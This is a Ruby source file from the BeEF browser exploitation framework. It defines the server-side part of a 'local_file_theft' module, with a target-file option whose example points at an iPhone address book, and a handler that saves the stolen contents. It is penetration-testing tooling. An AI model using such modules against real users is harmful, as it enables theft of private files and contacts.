26 lines
676 B
Ruby
26 lines
676 B
Ruby
#
|
|
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
|
|
# Browser Exploitation Framework (BeEF) - https://beefproject.com
|
|
# See the file 'doc/COPYING' for copying permission
|
|
#
|
|
# local_file_theft
|
|
#
|
|
# Shamelessly plagurised from kos.io/xsspwn
|
|
|
|
class Local_file_theft < BeEF::Core::Command
|
|
def self.options
|
|
[
|
|
{ 'name' => 'target_file',
|
|
'description' => 'The full path to the local file to steal e.g. file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb',
|
|
'ui_label' => 'Target file',
|
|
'value' => 'autodetect' }
|
|
]
|
|
end
|
|
|
|
def post_execute
|
|
content = {}
|
|
content['result'] = @datastore['result']
|
|
save content
|
|
end
|
|
end
|